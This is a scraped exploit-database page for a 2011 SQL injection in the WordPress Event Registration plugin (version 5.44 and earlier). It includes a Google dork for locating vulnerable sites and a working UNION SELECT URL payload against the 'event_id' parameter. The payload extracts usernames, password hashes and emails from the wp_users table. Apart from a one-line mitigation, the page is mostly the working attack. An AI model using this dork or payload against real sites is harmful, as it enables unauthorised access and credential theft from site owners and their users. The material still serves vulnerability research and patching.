Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Wordpress Event Registration plugin - exploit.company
header-logo
Suggest Exploit
vendor:
Wordpress Event Registration plugin
by:
serk
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Wordpress Event Registration plugin
Affected Version From: <= 5.44
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2011

WordPress Event Registration plugin <= 5.44 SQl Injection Vulnerability

The exploit allows an attacker to perform SQL injection by manipulating the 'event_id' parameter in the URL.

Mitigation:

Update to a version higher than 5.44 or apply a patch if available. Ensure user input is properly sanitized and validated.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Event Registration plugin <= 5.44 SQl Injection Vulnerability
# Google Dork: "?regevent_action=register&event_id"
# Date: 2011-09-09
# Author: serk
# Vendor: http://edgetechweb.com/
# Software Link: https://wordpress.org/extend/plugins/events-registration/
# Version: 5.44


[ exploit ]

domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--